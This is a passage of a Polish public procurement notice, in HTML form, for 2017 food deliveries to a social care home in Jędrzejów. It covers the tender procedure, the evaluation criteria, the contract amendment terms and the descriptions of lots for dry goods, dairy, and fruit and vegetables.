                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Formularz oferty -Załącznik nr 1 do SIWZ wraz z wypełnionymi formularzami cenowymi, 2) Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia 3) Pełnomocnictwo dla osób podpisujących ofertę (jeżeli dotyczy), </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy</div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />nie dotyczy</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy<br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br />nie dotyczy<br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b>nie dotyczy<br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              nie dotyczy<br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              nie dotyczy<br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              nie dotyczy<br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              nie dotyczy<br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              nie dotyczy<br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br />nie dotyczy</div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>30</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />nie dotyczy<br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br />nie dotyczy<br />
              Informacje dodatkowe
              <br />nie dotyczy<br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />nie dotyczy<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br />nie dotyczy<br />
              Wstępny harmonogram postępowania:
              <br />nie dotyczy<br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br />nie dotyczy<br /><br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />nie dotyczy<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Wzór umowy stanowi załącznik nr 2 do SIWZ</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px">nie dotyczy</div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dopuszczalność zmian umowy:
1.	Z zastrzeżeniem przypadków określonych w art. 144 ust. 1 pkt 2 -6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, Zamawiający dopuszcza możliwość zmiany umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach: 
1)	zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych oraz osób wskazanych do kontaktów między Stronami,
2)	w przypadku zmiany powyżej  3%  kwartalnego wskaźnika cen towarów  i  usług    opublikowanego  przez   Prezesa GUS w Monitorze Polskim,  o wielkość tegoż wskaźnika,   jednak   nie   wcześniej  niż   po   jego  ogłoszeniu   po   I kwartale 2017r. w stosunku do IV kwartału 2016r. Zmiana umowy w tym zakresie może być wprowadzona na wniosek Wykonawcy. Jednocześnie Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy do podwyższenia lub obniżenia cen towarów  np. rozporządzenie, obwieszczenie,  ustawa lub innej podstawy prawnej do zmiany cen;
3)	w przypadku obniżenia cen producenta lub zastosowania promocyjnej obniżki cen, Zamawiający zastrzega sobie prawo zakupu asortymentu objętego umową po cenach odpowiednio obniżonych. niezależnie od wszelkich czynników;
4)	zmian cen w przypadku okoliczności których nie można było przewidzieć w chwili zawarcia umowy. 
5)	pozostałych postanowień umowy nie stanowiących treści oferty Wykonawcy,
6)	wystąpienia Wykonawcy z wnioskiem do Zamawiającego o wyrażenie zgody na powierzenie Podwykonawcy części zamówienia, co do której Zamawiający nie zastrzegł osobistego wykonania przez Wykonawcę, a która nie była wskazana w złożonej przez Wykonawcę ofercie lub pomimo zobowiązania w ofercie wykonania zamówienia samodzielnie.
2.	Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze Stron, za zgodą drugiej Strony umowy, na podstawie aneksu do umowy.
3.	Zmiana cen w sytuacji określonej w ust. 1 pkt 3 nie wymaga aneksu. Zmiana nastąpi na uzasadniony wniosek jednej ze stron za zgodą drugiej strony.
4.	O miejscu i terminie podpisania umowy zamawiający powiadomi odrębnym pismem lub telefonicznie.
5.	Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji oraz danych zawartych w ofercie.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />nie dotyczy<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />nie dotyczy<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 25/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br />nie dotyczy<br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta wraz z załącznikami musi być sporządzona w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />nie dotyczy</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Artykuły sypkie (mąka, makarony, przyprawy, jaja, dodatki itp.)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia stanowią sukcesywne dostawy artykułów spożywczych  dla Domu Pomocy Społecznej w Jędrzejowie w roku 2017 zgodnie  z  warunkami  wynikającymi z obowiązujących przepisów, w szczególności rozporządzenia   (WE) nr 852/2004    Parlamentu     Europejskiego i  Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. Urz. UE L139 z dnia 30.04.2004r.),  rozporządzenia   (WE)    nr 853/2004   Parlamentu   Europejskiego i Rady z dnia 29 kwietnia  2004 r.   ustanawiającym   szczególne    przepisy    dotyczące    higieny w  odniesieniu   do  żywności   pochodzenia    zwierzęcego   (Dz. Urz. UE L 139 z 30.04.2004) oraz ustawy z dnia 25 sierpnia 2006 r. o  bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594)  
2.	 	Przedmiot zamówienia podzielony został odpowiednio na 4  części, zgodnie z załącznikami nr 1A  1D   które stanowią załączniki do oferty i integralną część SIWZ.
3.	  Dopuszcza się składanie ofert częściowych. Wykonawca może złożyć w postępowaniu wyłącznie jedną ofertę na jedną lub kilka części zamówienia.
4.	  Przez sukcesywną dostawę należy rozumieć cykliczną sprzedaż i dostawę artykułów spożywczych na podstawie zamówień dostosowanych do aktualnych potrzeb, składanych pisemnie (faksem, drogą elektroniczną)  przez pracownika DPS.
5.	  Wykonawca zobowiązany będzie dostarczyć zamówione produkty na własny koszt i ryzyko w miejsce wskazane przez Zamawiającego. W szczególności Wykonawca zobowiązany będzie zapewnić dostawę, rozładunek  i wniesienie dostarczonego asortymentu do pomieszczeń wskazanych przez pracownika Zamawiającego.
6.	   Odbiór artykułów spożywczych odbywać się będzie w siedzibie Zamawiającego po każdorazowym stwierdzeniu zgodności z zamówieniem, jakością i po podpisaniu przez obie strony dokumentu odbioru dostawy.
7.	   Produkty dostarczane nie mogą stwarzać żadnego niebezpieczeństwa zagrożenia zdrowia i życia mieszkańców Zamawiającego. Jeżeli zostaną ujawnione jakiekolwiek niebezpieczeństwa związane z uszkodzeniem produktu lub stwierdzeniem złej daty ważności do spożycia, stwierdzeniem cech popsucia produktu lub cech braku świeżości, Zamawiający wycofa produkt z dostawy a Wykonawca winien wadliwą partię wymienić na tożsame produkty wolne od wad na własny koszt. 
8.	  Zamawiający sprawdzi przedmiot zamówienia przy każdej dostawie i w razie stwierdzenia nieprawidłowości, zakwestionowania jakości towaru, nastąpi wymiana towaru na towar dobrej jakości w tym samym dniu. 
9.	  W przypadku braków asortymentowych Wykonawca niezwłocznie uzupełni brakujący towar.
10.	Wykonawca zapewnia, że dostarczane artykuły żywnościowe będą należytej jakości oraz że będą dostarczane w oryginalnych i nienaruszonych opakowaniach, nie później niż w połowie okresu przydatności do spożycia przewidzianego dla danego artykułu spożywczego. 
11.	Dostarczane produkty winny posiadać długi termin przydatności do spożycia zapewniający bezpieczne zużycie dostarczonych produktów a oznaczenie terminu ważności musi być czytelne. 
12.	Opakowania transportowe winny być nie naruszone.
13.	Zamawiający zastrzega sobie prawo niezrealizowania przedmiotu zamówienia w pełnej ilości artykułów określonych w formularzu cenowym.
14.	Podane ilości w formularzu cenowym stanowią wielkości szacunkowe. W przypadku zakupu przez Zamawiającego mniejszych ilości przedmiotu zamówienia Wykonawcy nie przysługują uprawnienia do dochodzenia jakichkolwiek roszczeń z tego tytułu. Zamawiający zastrzega sobie prawo dokonywania zmian ilości przedmiotu zamówienia w poszczególnych asortymentach stosownie do swoich potrzeb  a także do rezygnacji z niektórych pozycji.
15.	Wykonawca nie może bez zgody Zamawiającego dokonać zmiany rodzaju oferowanego produktu, który będzie objęty umową.
16.	Dostarczane produkty żywnościowe  w  zależności od ich kategorii muszą przy każdej   dostawie   posiadać  wszystkie   niezbędne  dokumenty  wymagane  przepisami  prawa   żywnościowego. 
17.	Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie przedmiotu zamówienia publicznego, w domyśle, wskazaniu takiemu każdorazowo towarzyszą wyrazy lub równoważny.  Zgodnie z art. 29 ust 3 ustawy prawo zamówień publicznych Zamawiający dopuszcza składanie ofert równoważnych i zastosowanie produktów równoważnych na cały asortyment stanowiący przedmiot zamówienia publicznego, tj. produktów innych producentów niż wymienione w SIWZ z zastrzeżeniem, by ich minimalne parametry jakościowe były co najmniej takie same jak parametry i cechy produktów wskazanych w opisie przedmiotu zamówienia publicznego.  Produkty równoważne mają mieć te same walory organoleptyczne - smak, zapach, barwę, estetykę, konsystencję.W przypadku zaoferowania asortymentu równoważnego, Wykonawca jest zobowiązany wykazać, że oferowany przez niego produkt spełnia wymagania określone przez Zamawiającego. Na potwierdzenie spełniania wymagań, Wykonawca przedłoży na żądanie Zamawiającego specyfikację produktu równoważnego oferowanego przez Wykonawcę, która ma zawierać wyszczególnione cechy charakterystyczne, potwierdzające zgodność oferowanego asortymentu z asortymentem opisanym przez Zamawiającego  (skład, wagę, gramaturę itp.). 
18.	UWAGA: Jeżeli zaoferowane artykuły będą posiadały parametry gorsze od wymaganych  w opisie przedmiotu zamówienia publicznego , Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt  2 ustawy prawo zamówień publicznych. Ciężar udowodnienia, że zaoferowane przez Wykonawcę artykuły odpowiadają wymaganiom wskazanym przez Zamawiającego, spoczywa na Wykonawcy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termin dostawy</td><td>30</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Nabiał (mleko i przetwory mleczne)  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia stanowią sukcesywne dostawy artykułów spożywczych  dla Domu Pomocy Społecznej w Jędrzejowie w roku 2017 zgodnie  z  warunkami  wynikającymi z obowiązujących przepisów, w szczególności rozporządzenia   (WE) nr 852/2004    Parlamentu     Europejskiego i  Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. Urz. UE L139 z dnia 30.04.2004r.),  rozporządzenia   (WE)    nr 853/2004   Parlamentu   Europejskiego i Rady z dnia 29 kwietnia  2004 r.   ustanawiającym   szczególne    przepisy    dotyczące    higieny w  odniesieniu   do  żywności   pochodzenia    zwierzęcego   (Dz. Urz. UE L 139 z 30.04.2004) oraz ustawy z dnia 25 sierpnia 2006 r. o  bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594)  
2.	 	Przedmiot zamówienia podzielony został odpowiednio na 4  części, zgodnie z załącznikami nr 1A  1D   które stanowią załączniki do oferty i integralną część SIWZ.
3.	  Dopuszcza się składanie ofert częściowych. Wykonawca może złożyć w postępowaniu wyłącznie jedną ofertę na jedną lub kilka części zamówienia.
4.	  Przez sukcesywną dostawę należy rozumieć cykliczną sprzedaż i dostawę artykułów spożywczych na podstawie zamówień dostosowanych do aktualnych potrzeb, składanych pisemnie (faksem, drogą elektroniczną)  przez pracownika DPS.
5.	  Wykonawca zobowiązany będzie dostarczyć zamówione produkty na własny koszt i ryzyko w miejsce wskazane przez Zamawiającego. W szczególności Wykonawca zobowiązany będzie zapewnić dostawę, rozładunek  i wniesienie dostarczonego asortymentu do pomieszczeń wskazanych przez pracownika Zamawiającego.
6.	   Odbiór artykułów spożywczych odbywać się będzie w siedzibie Zamawiającego po każdorazowym stwierdzeniu zgodności z zamówieniem, jakością i po podpisaniu przez obie strony dokumentu odbioru dostawy.
7.	   Produkty dostarczane nie mogą stwarzać żadnego niebezpieczeństwa zagrożenia zdrowia i życia mieszkańców Zamawiającego. Jeżeli zostaną ujawnione jakiekolwiek niebezpieczeństwa związane z uszkodzeniem produktu lub stwierdzeniem złej daty ważności do spożycia, stwierdzeniem cech popsucia produktu lub cech braku świeżości, Zamawiający wycofa produkt z dostawy a Wykonawca winien wadliwą partię wymienić na tożsame produkty wolne od wad na własny koszt. 
8.	  Zamawiający sprawdzi przedmiot zamówienia przy każdej dostawie i w razie stwierdzenia nieprawidłowości, zakwestionowania jakości towaru, nastąpi wymiana towaru na towar dobrej jakości w tym samym dniu. 
9.	  W przypadku braków asortymentowych Wykonawca niezwłocznie uzupełni brakujący towar.
10.	Wykonawca zapewnia, że dostarczane artykuły żywnościowe będą należytej jakości oraz że będą dostarczane w oryginalnych i nienaruszonych opakowaniach, nie później niż w połowie okresu przydatności do spożycia przewidzianego dla danego artykułu spożywczego. 
11.	Dostarczane produkty winny posiadać długi termin przydatności do spożycia zapewniający bezpieczne zużycie dostarczonych produktów a oznaczenie terminu ważności musi być czytelne. 
12.	Opakowania transportowe winny być nie naruszone.
13.	Zamawiający zastrzega sobie prawo niezrealizowania przedmiotu zamówienia w pełnej ilości artykułów określonych w formularzu cenowym.
14.	Podane ilości w formularzu cenowym stanowią wielkości szacunkowe. W przypadku zakupu przez Zamawiającego mniejszych ilości przedmiotu zamówienia Wykonawcy nie przysługują uprawnienia do dochodzenia jakichkolwiek roszczeń z tego tytułu. Zamawiający zastrzega sobie prawo dokonywania zmian ilości przedmiotu zamówienia w poszczególnych asortymentach stosownie do swoich potrzeb  a także do rezygnacji z niektórych pozycji.
15.	Wykonawca nie może bez zgody Zamawiającego dokonać zmiany rodzaju oferowanego produktu, który będzie objęty umową.
16.	Dostarczane produkty żywnościowe  w  zależności od ich kategorii muszą przy każdej   dostawie   posiadać  wszystkie   niezbędne  dokumenty  wymagane  przepisami  prawa   żywnościowego. 
17.	Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie przedmiotu zamówienia publicznego, w domyśle, wskazaniu takiemu każdorazowo towarzyszą wyrazy lub równoważny.  Zgodnie z art. 29 ust 3 ustawy prawo zamówień publicznych Zamawiający dopuszcza składanie ofert równoważnych i zastosowanie produktów równoważnych na cały asortyment stanowiący przedmiot zamówienia publicznego, tj. produktów innych producentów niż wymienione w SIWZ z zastrzeżeniem, by ich minimalne parametry jakościowe były co najmniej takie same jak parametry i cechy produktów wskazanych w opisie przedmiotu zamówienia publicznego.  Produkty równoważne mają mieć te same walory organoleptyczne - smak, zapach, barwę, estetykę, konsystencję.W przypadku zaoferowania asortymentu równoważnego, Wykonawca jest zobowiązany wykazać, że oferowany przez niego produkt spełnia wymagania określone przez Zamawiającego. Na potwierdzenie spełniania wymagań, Wykonawca przedłoży na żądanie Zamawiającego specyfikację produktu równoważnego oferowanego przez Wykonawcę, która ma zawierać wyszczególnione cechy charakterystyczne, potwierdzające zgodność oferowanego asortymentu z asortymentem opisanym przez Zamawiającego  (skład, wagę, gramaturę itp.). 
18.	UWAGA: Jeżeli zaoferowane artykuły będą posiadały parametry gorsze od wymaganych  w opisie przedmiotu zamówienia publicznego , Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt  2 ustawy prawo zamówień publicznych. Ciężar udowodnienia, że zaoferowane przez Wykonawcę artykuły odpowiadają wymaganiom wskazanym przez Zamawiającego, spoczywa na Wykonawcy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15500000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termin dostawy</td><td>30</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Warzywa i owoce przetworzone i nieprzetworzone<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	   Przedmiot zamówienia stanowią sukcesywne dostawy artykułów spożywczych  dla Domu Pomocy Społecznej w Jędrzejowie w roku 2017 zgodnie  z  warunkami  wynikającymi z obowiązujących przepisów, w szczególności rozporządzenia   (WE) nr 852/2004    Parlamentu     Europejskiego i  Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. Urz. UE L139 z dnia 30.04.2004r.),  rozporządzenia   (WE)    nr 853/2004   Parlamentu   Europejskiego i Rady z dnia 29 kwietnia  2004 r.   ustanawiającym   szczególne    przepisy    dotyczące    higieny w  odniesieniu   do  żywności   pochodzenia    zwierzęcego   (Dz. Urz. UE L 139 z 30.04.2004) oraz ustawy z dnia 25 sierpnia 2006 r. o  bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594)  
2.	 	Przedmiot zamówienia podzielony został odpowiednio na 4  części, zgodnie z załącznikami nr 1A  1D   które stanowią załączniki do oferty i integralną część SIWZ.
3.	  Dopuszcza się składanie ofert częściowych. Wykonawca może złożyć w postępowaniu wyłącznie jedną ofertę na jedną lub kilka części zamówienia.
4.	  Przez sukcesywną dostawę należy rozumieć cykliczną sprzedaż i dostawę artykułów spożywczych na podstawie zamówień dostosowanych do aktualnych potrzeb, składanych pisemnie (faksem, drogą elektroniczną)  przez pracownika DPS.
5.	  Wykonawca zobowiązany będzie dostarczyć zamówione produkty na własny koszt i ryzyko w miejsce wskazane przez Zamawiającego. W szczególności Wykonawca zobowiązany będzie zapewnić dostawę, rozładunek  i wniesienie dostarczonego asortymentu do pomieszczeń wskazanych przez pracownika Zamawiającego.
6.	   Odbiór artykułów spożywczych odbywać się będzie w siedzibie Zamawiającego po każdorazowym stwierdzeniu zgodności z zamówieniem, jakością i po podpisaniu przez obie strony dokumentu odbioru dostawy.
7.	   Produkty dostarczane nie mogą stwarzać żadnego niebezpieczeństwa zagrożenia zdrowia i życia mieszkańców Zamawiającego. Jeżeli zostaną ujawnione jakiekolwiek niebezpieczeństwa związane z uszkodzeniem produktu lub stwierdzeniem złej daty ważności do spożycia, stwierdzeniem cech popsucia produktu lub cech braku świeżości, Zamawiający wycofa produkt z dostawy a Wykonawca winien wadliwą partię wymienić na tożsame produkty wolne od wad na własny koszt. 
8.	  Zamawiający sprawdzi przedmiot zamówienia przy każdej dostawie i w razie stwierdzenia nieprawidłowości, zakwestionowania jakości towaru, nastąpi wymiana towaru na towar dobrej jakości w tym samym dniu. 
9.	  W przypadku braków asortymentowych Wykonawca niezwłocznie uzupełni brakujący towar.
10.	Wykonawca zapewnia, że dostarczane artykuły żywnościowe będą należytej jakości oraz że będą dostarczane w oryginalnych i nienaruszonych opakowaniach, nie później niż w połowie okresu przydatności do spożycia przewidzianego dla danego artykułu spożywczego. 
11.	Dostarczane produkty winny posiadać długi termin przydatności do spożycia zapewniający bezpieczne zużycie dostarczonych produktów a oznaczenie terminu ważności musi być czytelne. 
12.	Opakowania transportowe winny być nie naruszone.
13.	Zamawiający zastrzega sobie prawo niezrealizowania przedmiotu zamówienia w pełnej ilości artykułów określonych w formularzu cenowym.
